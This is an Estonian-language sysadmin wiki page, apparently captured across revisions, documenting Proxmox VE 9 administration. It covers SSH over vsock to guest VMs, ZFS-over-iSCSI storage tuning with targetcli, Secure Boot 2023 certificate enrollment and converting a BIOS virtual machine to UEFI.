root@zabbix-pub-01:~# systemctl status ssh.service
</pre>

Kusjuures vastav systemd ssh listen osakond jääb nagu on, 0.0.0.0/0 peale

<pre>
root@zabbix-pub-01:~# grep ^Lis /usr/lib/systemd/system/ssh.socket
ListenStream=0.0.0.0:22
</pre>

kus

* väidetavalt on see vajalik mingi sistemise systemd/ssh jne loogika toimimiseks.

ja laadida kerneli moodul

<pre>
root@zabbix-pub-01:~# modprobe vmw_vsock_virtio_transport
</pre>

Ubuntu 24.04 keskkonnas on tehniliselt kõik vajalik vsock kasutamiseks olemas, tuleb lisada kaks system elementi

* sshd-vsock.socket - õpetab systemd pid=1 protsessile kuulama võrgus 22/vsock pordil
* sshd-vsock@.service - õpetab 22/vsock pordile sissetuleva pöördumist üleandmist sshd protsessile

<pre>
root@zabbix-pub-01:~# ls -ld /etc/systemd/system/sshd-vsock*
-rw-r--r-- 1 root root 380 Jun 20 15:38 /etc/systemd/system/sshd-vsock@.service
-rw-r--r-- 1 root root 265 Jun 20 13:33 /etc/systemd/system/sshd-vsock.socket
</pre>

ning

<pre>
root@zabbix-pub-01:~# cat /etc/systemd/system/sshd-vsock.socket
[Unit]
Description=OpenSSH Server Socket (AF_VSOCK Network-Independent Line)
Documentation=man:sshd(8) man:sshd_config(5)
# Notice: No "Conflicts=" or "Before=" entries are needed here!

[Socket]
ListenStream=vsock::22
Accept=yes

[Install]
WantedBy=sockets.target

root@zabbix-pub-01:~# cat /etc/systemd/system/sshd-vsock@.service
[Unit]
Description=OpenSSH Server Socket Per-Connection Daemon (VSOCK Backup)
Documentation=man:sshd(8) man:sshd_config(5)
After=auditd.service

[Service]
EnvironmentFile=-/etc/default/ssh
# The -i flag forces sshd to run in "inetd" mode to accept the raw systemd socket
ExecStart=-/usr/sbin/sshd -i $SSHD_OPTS
StandardInput=socket
RuntimeDirectory=sshd
RuntimeDirectoryMode=0755
</pre>

Käivitamiseks sobib öelda

<pre>
root@zabbix-pub-01:~# systemctl daemon-reload
root@zabbix-pub-01:~# systemctl enable --now sshd-vsock.socket
</pre>

Tulemusena kuulatakse 22/vsock peal

<pre>
root@zabbix-pub-01:~# systemctl list-sockets | grep ssh
192.168.10.194:22 ssh.socket ssh.service
vsock::22 sshd-vsock.socket -
</pre>

Kasutamine paistab välja nii

<pre>
root@pve-wrx90e:~# ssh root@vsock/50194
</pre>

===Proxmox VE Firewall===

====Misc====

Probleeme tekitada võiv kombinatsioon, vältida

* Hardware -> network device -> Firewall - Enable
* Firewall -> Option - No

====Kasulikud lisamaterjalid====

* https://pve.proxmox.com/pve-docs-7/chapter-pve-firewall.html

===Misc===

Tundub, et pve 9 ja qemu 11 kandis on hakanud ilmuma 'x86_64 v2 aes' virtuaalse protsessori kasutamisel sellised teated, nt 'host' protsessoriga neid ei ole

<pre>
root@pve-wrx90e:~# pveversion
pve-manager/9.2.3/d0fde103346cf89a (running kernel: 7.0.6-2-pve)

root@pve-wrx90e:~# dmesg | grep WRMSR | tail -n 4
[30021.694536] kvm: kvm [323176]: vcpu0, guest rIP: 0xffffffffb807e744 Unhandled WRMSR(0xc0010007) = 0xffff
[30090.614209] kvm: kvm [324048]: vcpu0, guest rIP: 0xffffffff84e6d9b4 Unhandled WRMSR(0xc0010007) = 0xffff
[30308.798770] kvm: kvm [326811]: vcpu0, guest rIP: 0xffffffff8d67e744 Unhandled WRMSR(0xc0010007) = 0xffff
[180421.745980] kvm: kvm [3632532]: vcpu0, guest rIP: 0xffffffff81242297 Unhandled WRMSR(0xc0010007) = 0xffff
</pre>

===arm64 platvormi emuleerimine===

Tundub, et PVE v. 9.2 juures ilmub webgui peale vcpu valik 'arm (64-bit)'

[[Fail:20260614-pve-01.png|600px]]

kus

* tulemusena ta töötab, aga väga nö rahulikult

<pre>
root@pve-svc-02:~# apt-get install pve-edk2-firmware-aarch6
</pre>

===Kasulikud lisamaterjalid===

* TODO

Proxmox v. 9 kasutamine

2026-06-20T14:27:12Z

Imre: /* arm64 platvormi emuleerimine */

===Sissejuhatus===

TODO

===Virtuaalne riistvara===

Klaviatuur ja hiir

<pre>
root@pwrk-02:~# systool -b serio
Bus = "serio"

Device = "serio0"
Device = "serio1"

root@pwrk-02:~# systool -b serio -v
Bus = "serio"

Device = "serio0"
Device path = "/sys/devices/platform/i8042/serio0"
bind_mode = "auto"
description = "i8042 KBD port"
drvctl = <store method only>
err_count = "0"
extra = "0"
firmware_id = "PNP: PNP0303"
force_release = "369-370"
modalias = "serio:ty06pr00id00ex00"
scroll = "0"
set = "2"
softraw = "1"
softrepeat = "0"
uevent = "DRIVER=atkbd
SERIO_TYPE=06
SERIO_PROTO=00
SERIO_ID=00
SERIO_EXTRA=00
MODALIAS=serio:ty06pr00id00ex00
SERIO_FIRMWARE_ID=PNP: PNP0303"

Device = "serio1"
Device path = "/sys/devices/platform/i8042/serio1"
bind_mode = "auto"
description = "i8042 AUX port"
drvctl = <store method only>
firmware_id = "PNP: PNP0f13"
modalias = "serio:ty01pr00id00ex00"
protocol = "VirtualPS/2"
rate = "100"
resetafter = "5"
resolution = "200"
resync_time = "0"
uevent = "DRIVER=psmouse
SERIO_TYPE=01
SERIO_PROTO=00
SERIO_ID=00
SERIO_EXTRA=00
MODALIAS=serio:ty01pr00id00ex00
SERIO_FIRMWARE_ID=PNP: PNP0f13"
</pre>

===remote zfs over iscsi===

====Mõisted====

* FUA (Forced Unit Access) -
* WCE (Write Cache Enable) -
* TPU (Thin Provisioning UNMAP) -
* TPWS (WRITE_SAME / Zeroing) -
* VFS (virtual file system) -

====Tööpõhimõte====

Virtuaalse arvuti vaatest andmetega tegelemine

pve virtuaalne arvuti -> pve füüsiline arvuti -> over-iscsi-zfs-storage-server

Sõltuvalt qemu virtuaalse arvuti virtuaalse plokkseadme 'Cache' seadistustest on võimalik erinevate cache komplektide-kombinatsioonide kasutamine andmete liikumisel virtuaalses arvutis töötava protsessi juurest zfs storage serveri füüsilisele plokkseadmele. Tundub, et 2025 aastal on kõige keskmisemale kasutusele sobiv valik 'Cache: nocache'

* hea jõudlus
* hea terviklus

Andmete liikumise teekond

* virtuaalse arvuti rakendus
* virtuaalse arvuti vfs failisüsteem
* virtuaalse arvuti page cache (vfs'ga seotud)
* virtuaalse arvuti ext4 failisüsteem (ext4 draiver)
* virtuaalse arvuti lvm
* virtuaalse arvuti fdisk partitsioonid
* virtuaalse arvuti virtuaalne sata vms kontroller
* füüsilise arvuti qemu protsess
* füüsilise arvuti open-iscsi poolt teostatud /dev/sda scsi plokkseade (puudub cache)
* füüsilises arvutis storage'ga seotud cache puudub
* storage arvuti targetcli (puutub cache)
* storage arvuti zfs ressurss (sisaldab zfs cache)
* storage avuti füüsilise plokkseadme controller-cache

'Cache: nocache' parameeter on üks vähestest parameetritest, mis avaldab mõju nö mõlemas suunas

* virtuaalse arvuti seest kasutada olevale storage ressursile
* kuidas füüsilise arvuti sees virtuaalsele arvutile vastav qemu protsess kasutab allolevat plokkseadet

Käesolevas tekstis kirjeldatakse nelja komponendi seadistamist

* virtuaalsele arvutile vastav qemu protsess
* iscsi initiator
* iscsi target
* zfs lahendus

====zfs lahendus iscsi target arvutis====

Füüsilised kettad on kasutusel nö kõige tavalisemal viisil, eriti tähendab see, et ketastel on sisselülitatud nö tavaline controller-cache

<pre>
root@pve-svc-02:~# lsscsi -s | grep 4.00T
[2:0:0:0] disk ATA CT4000MX500SSD1 045 /dev/sdc 4.00TB
[3:0:0:0] disk ATA CT4000MX500SSD1 045 /dev/sdd 4.00TB
[N:0:1:1] disk Samsung SSD 990 PRO with Heatsink 4TB__1 /dev/nvme0n1 4.00TB
[N:1:1:1] disk Samsung SSD 990 PRO with Heatsink 4TB__1 /dev/nvme1n1 4.00TB
</pre>

zfs lülituse moodustamine

<pre>
root@pve-svc-02:~# cat create-zpool-raidz1-x4.sh
zpool create -o ashift=13 zp_data raidz1 \
/dev/disk/by-id/ata-CT4000MX500SSD1_2246E686FE58 \
/dev/disk/by-id/ata-CT4000MX500SSD1_2246E686FF7B \
/dev/disk/by-id/nvme-Samsung_SSD_990_PRO_with_Heatsink_4TB_S7DSNJ0X501827B \
/dev/disk/by-id/nvme-Samsung_SSD_990_PRO_with_Heatsink_4TB_S7DSNJ0X501856Z
</pre>

zfs cache töötab tavalisel viisil, st on sisse lülitatud olekus, nt

<pre>
root@pve-svc-02:~# zfs get all | grep -i cache | grep vm-106-disk-0
zp_crucial_mx_4/vm-106-disk-0 primarycache all default
zp_crucial_mx_4/vm-106-disk-0 secondarycache all default
</pre>

====targetcli iscsi target arvutis====

targetcli seadistamine koosneb kahest tegevusest

* zfs põhise alus-storage storage publitseerimine
* publitseerimisel sobivalt scsi protokolli parameetrite kasutamine (eriti cache, sparse jms esitamine)

<pre>
/> /iscsi create iqn.2025-10.moraal.srv:storage.zfstarget
/> /iscsi/iqn.2025-10.moraal.srv:storage.zfstarget/tpg1/acls create iqn.1993-08.org.debian:01:4cbe32bd26b
</pre>

Sobiv seadistus, mis tuleb plokk-ressursi jaoks kehtestada

<pre>
root@pve-svc-02:~# targetcli /backstores/block/zp_crucial_mx_4-vm-108613-disk-4 get attribute | grep =
======================
alua_support=1
block_size=512
emulate_3pc=1
emulate_caw=1
emulate_dpo=1
emulate_fua_read=1
emulate_fua_write=1
emulate_model_alias=1
emulate_pr=1
emulate_rest_reord=0
emulate_rsoc=1
emulate_tas=1
emulate_tpu=0
emulate_tpws=0
emulate_ua_intlck_ctrl=0
emulate_write_cache=0
enforce_pr_isids=1
force_pr_aptpl=0
hw_block_size=512 [ro]
hw_max_sectors=32768 [ro]
hw_pi_prot_type=0 [ro]
hw_queue_depth=128 [ro]
is_nonrot=1
max_unmap_block_desc_count=1
max_unmap_lba_count=131072
max_write_same_len=65535
optimal_sectors=32768
pgr_support=1
pi_prot_format=0
pi_prot_type=0
pi_prot_verify=0
queue_depth=128
submit_type=0
unmap_granularity=8
unmap_granularity_alignment=0
unmap_zeroes_data=0
</pre>

kus

* TODO

Muudatuse tegemine

<pre>
/backstores/b...108613-disk-4> set attribute emulate_tpws=0
/backstores/b...108613-disk-4> set attribute emulate_tpu=0
</pre>

Kasutamine paistab välja selline

<pre>
root@pve-svc-02:~# targetcli
targetcli shell version 2.1.53
Copyright 2011-2013 by Datera, Inc and others.
For help on commands, type 'help'.

/> ls
o- / ......................................................................................................................... [...]
o- backstores .............................................................................................................. [...]
| o- block .................................................................................................. [Storage Objects: 3]
| | o- zp_crucial_mx_4-vm-100-disk-0 ......................... [/dev/zp_crucial_mx_4/vm-100-disk-0 (20.0GiB) write-thru activated]
| | | o- alua ................................................................................................... [ALUA Groups: 1]
| | | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| | o- zp_crucial_mx_4-vm-106-disk-5 ......................... [/dev/zp_crucial_mx_4/vm-106-disk-5 (16.0GiB) write-thru activated]
| | | o- alua ................................................................................................... [ALUA Groups: 1]
| | | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| | o- zp_crucial_mx_4-vm-108613-disk-1 .................... [/dev/zp_crucial_mx_4/vm-108613-disk-1 (4.0GiB) write-thru activated]
| | o- alua ................................................................................................... [ALUA Groups: 1]
| | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| o- fileio ................................................................................................. [Storage Objects: 0]
| o- pscsi .................................................................................................. [Storage Objects: 0]
| o- ramdisk ................................................................................................ [Storage Objects: 0]
o- iscsi ............................................................................................................ [Targets: 1]
| o- iqn.2025-10.moraal.srv:storage.zfstarget .......................................................................... [TPGs: 1]
| o- tpg1 ............................................................................................... [no-gen-acls, no-auth]
| o- acls .......................................................................................................... [ACLs: 1]
| | o- iqn.1993-08.org.debian:01:4cbe32bd26b ................................................................ [Mapped LUNs: 3]
| | o- mapped_lun0 ...................................................... [lun0 block/zp_crucial_mx_4-vm-108613-disk-1 (rw)]
| | o- mapped_lun1 ......................................................... [lun1 block/zp_crucial_mx_4-vm-106-disk-5 (rw)]
| | o- mapped_lun2 ......................................................... [lun2 block/zp_crucial_mx_4-vm-100-disk-0 (rw)]
| o- luns .......................................................................................................... [LUNs: 3]
| | o- lun0 .............. [block/zp_crucial_mx_4-vm-108613-disk-1 (/dev/zp_crucial_mx_4/vm-108613-disk-1) (default_tg_pt_gp)]
| | o- lun1 .................... [block/zp_crucial_mx_4-vm-106-disk-5 (/dev/zp_crucial_mx_4/vm-106-disk-5) (default_tg_pt_gp)]
| | o- lun2 .................... [block/zp_crucial_mx_4-vm-100-disk-0 (/dev/zp_crucial_mx_4/vm-100-disk-0) (default_tg_pt_gp)]
| o- portals .................................................................................................... [Portals: 1]
| o- 0.0.0.0:3260 ..................................................................................................... [OK]
o- loopback ......................................................................................................... [Targets: 0]
o- srpt ............................................................................................................. [Targets: 0]
o- vhost ............................................................................................................ [Targets: 0]
o- xen-pvscsi ....................................................................................................... [Targets: 0]
/>
</pre>

Lisaks saab portaali käest küsida attribute ja parameter komplekte, nt

<pre>
root@pm60-trt:~# targetcli /iscsi/iqn.2022-09.ee.moraal:pbs-pub/tpg1 get parameter | grep =
======================
AuthMethod=CHAP
DataDigest=CRC32C,None
DataPDUInOrder=Yes
DataSequenceInOrder=Yes
DefaultTime2Retain=20
DefaultTime2Wait=2
ErrorRecoveryLevel=0
FirstBurstLength=65536
HeaderDigest=CRC32C,None
IFMarkInt=Reject
IFMarker=No
ImmediateData=Yes
InitialR2T=Yes
MaxBurstLength=262144
MaxConnections=1
MaxOutstandingR2T=1
MaxRecvDataSegmentLength=8192
MaxXmitDataSegmentLength=262144
OFMarkInt=Reject
OFMarker=No
TargetAlias=LIO Target

root@pm60-trt:~# targetcli /iscsi/iqn.2022-09.ee.moraal:pbs-pub/tpg1 get attribute | grep =
======================
authentication=1
cache_dynamic_acls=0
default_cmdsn_depth=64
default_erl=0
demo_mode_discovery=1
demo_mode_write_protect=1
fabric_prot_type=0
generate_node_acls=0
login_keys_workaround=1
login_timeout=15
prod_mode_write_protect=0
t10_pi=0
tpg_enabled_sendtargets=1
root@pm60-trt:~#
</pre>

kus

* parameter - võrgus kõneldavad asjad
* attribute - lokaalselt olukorda määratlevad asjad

====iscsi initiator====

TODO

====qemu protsess====

Kasutamine

[[Fail:20251019-remote-zfs-over-iscsi-01.png|600px]]

====Kasulikud lisamaterjalid====

TODO

===Secure boot - nn Microsoft 2023 sertifikaat===

====Tööpõhimõte====

TODO

====Olemasolev olukord enne muudatust====

<pre>
root@pwrk-01:~# apt-get install efitools
root@pwrk-01:~# (printf "db: \n"; efi-readvar -v db; printf "\nKEK: \n"; efi-readvar -v KEK) | grep -E "2011|2023"
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Windows Production PCA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation UEFI CA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation KEK CA 2011
</pre>

====Muudatus====

<pre>
root@pve-wrx90e:~# qm enroll-efi-keys 902198
skipping - OS type is neither Windows 10 nor Windows 11

root@pve-wrx90e:~# qm set 902198 --ostype win10
root@pve-wrx90e:~# qm enroll-efi-keys 902198
root@pve-wrx90e:~# qm set 902198 --ostype l26
</pre>

ja

<pre>
from

efidisk0: si-dpool:vm-902198-disk-0,efitype=4m,pre-enrolled-keys=1,size=1M

to

efidisk0: si-dpool:vm-902198-disk-0,efitype=4m,ms-cert=2023w,pre-enrolled-keys=1,size=1M
</pre>

====Uus olukord peale muudatust====

<pre>
root@pwrk-02:~# (printf "db: \n"; efi-readvar -v db; printf "\nKEK: \n"; efi-readvar -v KEK) | grep -E "2011|2023"
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Windows Production PCA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation UEFI CA 2011
C=US, O=Microsoft Corporation, CN=Microsoft UEFI CA 2023
C=US, O=Microsoft Corporation, CN=Windows UEFI CA 2023
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation KEK CA 2011
</pre>

====WebGUI abil====

WebGUI abil vm sertifikaat muudatus

Disk Action -> Enroll Updated Certificates

[[Fail:20260611-pve-ms-cert-2023-01.png|700px]]

kus

* TODO

===Misc===

====pveupdate====

* uuendab webgui liidese sertifikaadi

<pre>
root@pve-wrx90e:~# pveupdate
Loading ACME account details
Placing ACME order
Order URL: https://acme-v02.api.letsencrypt.org/acme/order/2232348225/504476182801

Getting authorization details from 'https://acme-v02.api.letsencrypt.org/acme/authz/2232348225/694056506271'
The validation for pve-wrx90e.auul.pri.ee is pending!
Setting up webserver
Triggering validation
Sleeping for 5 seconds
Status is 'valid', domain 'pve-wrx90e.auul.pri.ee' OK!

All domains validated!

Creating CSR
Checking order status
Order is ready, finalizing order
valid!

Downloading certificate
Setting pveproxy certificate and key
Restarting pveproxy
Revoking old certificate
Revoke request to CA failed: Error: POST to https://acme-v02.api.letsencrypt.org/acme/revoke-cert
{
"type": "urn:ietf:params:acme:error:unauthorized",
"detail": "Unable to revoke :: Certificate is expired",
"status": 403
}
</pre>

====pveupgrade====

* uuendab süsteemi apt paketihaldusega tarkvara

===BIOS arvuti teisendamine UEFI arvutiks===

====Tööpõhimõte====

Peamised kaalutlused BIOS arvuti teisendamisel UEFI arvutiks

* vajadus saada osa secure boot lahendusega kaasnevast turvalisusest
* nö täieline reinstall oleks liiga aeganõudev, kohmakas jne

Muudatus seisneb virtuaalsele arvutile täiendava nö esimese plokkseadme lisamisel, suurusega 1 G. Sinna moodustatakse gpt partitsioonitabel ning vfat failisüsteem, ja ta vastab nö kataloogile /boot/efi, sinna ta ka monteeritakse kokkuvõttes. Juurfailisüsteem ja muu jääb sinna kus ta seni on olnud. Oluline on, et muudatuse käigus ei muudeta olemasoleva plokkseadme partitsioonitabelit ega lvm vms, st ebaõnnestumisel saab pöörduda tagasi kergesti (varundus peaks aga siiski olema olemas).

====Muudatuse protseduur====

Enne muudatust paistab virtuaalne arvuti selline

[[Fail:20260516-from-bios-to-uefi-01.png|700px]]

ning

<pre>
# df -T -h -t ext4
Failisüsteem Tüüp Maht Kasut Vaba Kas% Haagitud
/dev/mapper/system-root ext4 11G 8,2G 2,2G 80% /
/dev/vda1 ext4 462M 325M 109M 75% /boot
</pre>

Lisatakse töötavale arvutile 1 g plokkseade

Hardware -> Add disk -> ...

Veendutakse, mis on konkreetsel juhtumil 1 g lisatud plokkseadme nimi, nt

<pre>
# fdisk /dev/vdb -l
Disk /dev/vdb: 1 GiB, 1073741824 bytes, 2097152 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
</pre>

edasi käsundamine

<pre>
# apt-get install parted

# parted /dev/vdb mklabel gpt
# parted /dev/vdb mkpart primary fat32 1MiB 100%
# parted /dev/vdb set 1 esp on
# mkfs.vfat -F 32 /dev/vdb1
# mkdir -p /boot/efi
# blkid /dev/vdb1
</pre>

Muuta /etc/fstab faili, st lisada üks rida olemaoleva /boot rea alla, uuid on mitte partitsiooni, aga vfat failisüsteemi

<pre>
# cat /etc/fstab
..
UUID=XXXX-XXXX /boot/efi vfat defaults 0 2
</pre>

Lisada paketid

<pre>
# systemctl daemon-reload
# mount /boot/efi
# apt update
# apt install grub-efi-amd64-signed shim-signed mokutil
# grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=debian --removable
# update-grub
</pre>

tulemusena

<pre>
# find /boot/efi/ -type f -ls
115 932 -rwxr-xr-x 1 root root 952384 mai 17 12:00 /boot/efi/EFI/BOOT/BOOTX64.EFI
116 2624 -rwxr-xr-x 1 root root 2685544 mai 17 12:00 /boot/efi/EFI/BOOT/grubx64.efi
117 832 -rwxr-xr-x 1 root root 851368 mai 17 12:00 /boot/efi/EFI/BOOT/mmx64.efi
118 4 -rwxr-xr-x 1 root root 112 mai 17 12:00 /boot/efi/EFI/BOOT/BOOTX64.CSV
119 4 -rwxr-xr-x 1 root root 112 mai 17 12:00 /boot/efi/EFI/BOOT/grub.cfg

# cat /boot/efi/EFI/BOOT/grub.cfg
search.fs_uuid 5ebbc6f0-69e8-413b-bb4f-4ec0fa5d2fc1 root
set prefix=($root)'/grub'
configfile $prefix/grub.cfg

# blkid /dev/vda1
/dev/vda1: UUID="5ebbc6f0-69e8-413b-bb4f-4ec0fa5d2fc1" BLOCK_SIZE="1024" TYPE="ext4" PARTUUID="cfa36d3a-01"
</pre>

Õeldakse virtuaalsele arvutile poweroff ja muudetakse seadistusi

* lisatakse 'EFI Disk' (virtuaalne efi riistvara seadistuste salvestamine jms)
* muudetakse bios -> uefi
* muudetakse chipset i440fx -> q35
* muudetakse display default -> virtio-gpu

Peale muudatust paistab virtuaalne arvuti selline

[[Fail:20260516-from-bios-to-uefi-02.png|700px]]

Lisaks on boot järjekorra seadmed muudetud

[[Fail:20260516-from-bios-to-uefi-03.png|700px]]

kus

* tingimata vajalik on virtio1 ja virtio0 - esimesel on bootload ja grub.cfg lühike konf, teisel on konfi sisuline osa

Tulemusena töötab arvuti uefi secure boot režiimis

<pre>
# mokutil --sb-state
SecureBoot enabled

# df -t vfat -t ext4 -T -h
Failisüsteem Tüüp Maht Kasut Vaba Kas% Haagitud
/dev/mapper/system-root ext4 11G 8,2G 2,2G 80% /
/dev/vda1 ext4 462M 325M 109M 75% /boot
/dev/vdb1 vfat 1020M 8,7M 1012M 1% /boot/efi
</pre>

Kõige lõpus võiks veel öelda, nii tekivad nö naturaalsed efibootmgr ja /boot/efi sissekanded nagu nad oleks seal nö sündinud-uefi'na arvutil

<pre>
# efibootmgr
BootCurrent: 0002
Timeout: 3 seconds
BootOrder: 0002,0003,0000,0001
Boot0000* BootManagerMenuApp FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(eec25bdc-67f2-4d95-b1d5-f81b2039d11d)
Boot0001* EFI Firmware Setup FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(462caa21-7614-4503-836e-8ab6f4662331)
Boot0002* UEFI Misc Device PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xb,0x0){auto_created_boot_option}
Boot0003* UEFI Misc Device 2 PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xa,0x0){auto_created_boot_option}

# grub-install /dev/vdb
Installing for x86_64-efi platform.
Installation finished. No error reported.

# efibootmgr
BootCurrent: 0002
Timeout: 3 seconds
BootOrder: 0004,0002,0003,0000,0001
Boot0000* BootManagerMenuApp FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(eec25bdc-67f2-4d95-b1d5-f81b2039d11d)
Boot0001* EFI Firmware Setup FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(462caa21-7614-4503-836e-8ab6f4662331)
Boot0002* UEFI Misc Device PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xb,0x0){auto_created_boot_option}
Boot0003* UEFI Misc Device 2 PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xa,0x0){auto_created_boot_option}
Boot0004* debian HD(1,GPT,0fb8cfd1-c90b-4da2-97db-ceda14464a90,0x800,0x1ff000)/File(\EFI\proxmox\shimx64.efi)
</pre>

====Boot Order märkused====

PVE webgui Boot Order määrab kaks

* millised plokkseadmed osalevad uefi faasis
* millised järjekorras plokkseadmed osalevad uefi faasis alglaadimisel

Kui on linnutatud ainult üks seade

[[Fail:20260516-from-bios-to-uefi-05.png|800px]]

Kui on linnutatud ainult kaks seadet

[[Fail:20260516-from-bios-to-uefi-04.png|800px]]

Antud juhul on see väga oluline kuna grub alglaadur on kahel seadmel laiali

* grub.efi rakendus asub /dev/vdb
* grub.conf seadistus asub /dev/vda

Kui Boot Order on linnutatud vaid /dev/vda, siis peatub arvuti käivitumine 'grub>' prompt juures. Selles mõttes võiks olla PVE webgui osakonna nimeks nt 'UEFI device visibility and Boot Order'.

===Üle vsock ssh kasutamine - Ubuntu 26.04 ja Debian v. 13===

Osutub, et uuemal ajal, st PVE v. 9, Debian v. 13 virtuaalne avuti on võimalik PVE host pealt pöörduda guest poole üle ssh kasutades vsock protokolli (mitte tavalist tcp/ip protokollil põhinevat võrku). Selleks tuleb virtuaalsele arvutile lisada PVE platvormi poolt vsock tugi

<pre>
root@pve-wrx90e:~# head -n 1 /etc/pve/qemu-server/50056.conf
args: -device vhost-vsock-pci,guest-cid=50056
</pre>

ja virtuaalsel arvutil peab olema tarkvaraline vsock tugi. Nt Debian v. 13 puhul on sshd serverisse see integreeritud

<pre>
root@unifi-oss:~# systemctl | grep ssh
ssh.service loaded active running OpenBSD Secure Shell server
sshd@2-50056:22-2:3327097365.service loaded active running OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097364)
system-sshd.slice loaded active active Slice /system/sshd
sshd-unix-local.socket loaded active listening OpenSSH Server Socket (systemd-ssh-generator, AF_UNIX Local)
sshd-vsock.socket loaded active listening OpenSSH Server Socket (systemd-ssh-generator, AF_VSOCK)
ssh-access.target loaded active active SSH Access Available
</pre>

kus

* systemd-ssh-generator on selline süsteem, mis käigult avastab süsteemi võimekusi ja vastavalt seadistab teenustele omadusi (nt ssh puhul lülitatakse sisse vsock tugi)

ning

<pre>
root@unifi-oss:~# systemctl status sshd@2-50056:22-2:3327097365.service
● sshd@2-50056:22-2:3327097365.service - OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097365)
Loaded: loaded (/usr/lib/systemd/system/sshd@.service; static)
Active: active (running) since Mon 2026-06-01 00:04:39 EEST; 16s ago
Invocation: 84acdad56690460e8e0fbffd2ecd4d69
TriggeredBy: ● sshd-vsock.socket
Docs: man:sshd(8)
man:sshd_config(5)
Main PID: 876 (sshd-session)
Tasks: 1 (limit: 6978)
Memory: 1.8M (peak: 3.9M)
CPU: 27ms
CGroup: /system.slice/system-sshd.slice/sshd@2-50056:22-2:3327097365.service
‣ 876 "sshd-session: root [priv]"

Jun 01 00:04:39 unifi-oss systemd[1]: Started sshd@2-50056:22-2:3327097365.service - OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097365).
Jun 01 00:04:40 unifi-oss sshd-session[876]: Accepted publickey for root from UNKNOWN port 65535 ssh2: ED25519 SHA256:3cj7QCk4leNOSQJlfeUeHr6YfsA0r3bRUqZS9Rey3jM
Jun 01 00:04:40 unifi-oss sshd-session[876]: pam_unix(sshd:session): session opened for user root(uid=0) by root(uid=0)
</pre>

kus

* triggered by 'sshd-vsock.socket'

ssh kliendi st pve host poolel peab olema teadmine, kuidas käituda kui üritatakse kasutada vsock protokolli üle sshd serverit

<pre>
root@pve-wrx90e:~# cat /lib/systemd/ssh_config.d/20-systemd-ssh-proxy.conf
# SPDX-License-Identifier: LGPL-2.1-or-later
#
# Allow connecting to the local host directly via ".host"
Host .host machine/.host
ProxyCommand /usr/lib/systemd/systemd-ssh-proxy unix/run/ssh-unix-local/socket %p
ProxyUseFdpass yes
CheckHostIP no

# Make sure unix/* and vsock/* can be used to connect to AF_UNIX and AF_VSOCK paths.
# Make sure machine/* can be used to connect to local machines registered in machined.
#
Host unix/* vsock/* machine/*
ProxyCommand /usr/lib/systemd/systemd-ssh-proxy %h %p
ProxyUseFdpass yes
CheckHostIP no

# Disable all kinds of host identity checks, since these addresses are generally ephemeral.
StrictHostKeyChecking no
UserKnownHostsFile /dev/null
</pre>

kus

* tuleb kasutada 'man systemd-ssh-proxy' utiliiti

Kasutamine paistab välja selline

<pre>
root@pve-wrx90e:~# ssh root@vsock/50056
Warning: Permanently added 'vsock/50056' (ED25519) to the list of known hosts.
Linux unifi-oss 6.12.90+deb13.1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.90-2 (2026-05-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun May 31 23:53:37 2026 from 192.168.10.156
root@unifi-oss:~#

root@unifi-oss:~# w
23:59:55 up 6 min, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/1 - 23:59 1.00s 0.00s ? w
</pre>

kus

* vsock kaudu lähenemise puhul on iseloomulik 'FROM -' (tavaliselt on seal src ip aadress)

Peale kasutaja sisselogimist paistab

<pre>
root@unifi-oss:~# ss -a -p --vsock
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
v_str LISTEN 0 0 *:22 *:* users:(("systemd",pid=1,fd=66))
v_str ESTAB 0 0 50056:22 2:3327097366 users:(("sshd-session",pid=914,fd=7),("sshd-session",pid=914,fd=6),("sshd-session",pid=905,fd=7),("sshd-session",pid=905,fd=6),("systemd",pid=1,fd=8))
</pre>

kus

* af_vsock osakonnas on sarnasel af_inet osakonnale ka listen socket ning 'active connected socket'

Tundub, et uuemal ajal on ssh agar kuulama ka af_unix soketil

<pre>
root@unifi-oss:~# screendump | grep -i ssh
[ OK ] Listening on sshd-unix-local.socket - OpenSSH Server Socket (systemd-ssh-generator, AF_UNIX Local).
[ OK ] Listening on sshd-vsock.socket - OpenSSH Server Socket (systemd-ssh-generator, AF_VSOCK).
[ OK ] Reached target ssh-access.target - SSH Access Available.
Starting ssh.service - OpenBSD Secure Shell server...
[ OK ] Started ssh.service - OpenBSD Secure Shell server.
</pre>

ja tõesti, lokaalselt saab arvutisse logida sisse nii

<pre>
root@unifi-oss:~# ssh unix/run/ssh-unix-local/socket
